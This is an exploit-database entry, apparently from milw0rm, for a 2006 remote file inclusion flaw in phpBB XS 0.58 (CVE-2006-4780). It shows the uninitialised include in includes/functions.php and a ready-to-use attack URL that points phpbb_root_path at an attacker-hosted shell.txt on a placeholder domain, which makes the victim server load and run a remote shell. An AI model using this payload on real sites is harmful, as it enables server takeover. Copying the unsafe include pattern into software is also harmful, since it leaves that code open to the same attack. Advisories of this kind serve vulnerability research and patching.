phpBB XS 0.58 - 'functions.php' Remote File Inclusion

Author: AzzCoder
type: webapps
platform: php
port: 
date_added: 2006-09-11 
date_updated:  
verified: 1 
codes: OSVDB-28781;CVE-2006-4780 
tags: 
aliases:  
screenshot_url:  
application_url: 

Author: AzzCoder

Vendor: http://www.phpbbxs.eu/

Vulnerable File: includes/functions.php

Vulnerable Code:

//The phpbb_root_path isn't initialize

include_once( $phpbb_root_path . './includes/functions_categories_hierarchy.' . $phpEx );

Method To Use:

http://www.victim.com/[phpbb_xs]/includes/functions.php?phpbb_root_path=http://yourdomain.com/shell.txt?

# milw0rm.com [2006-09-12]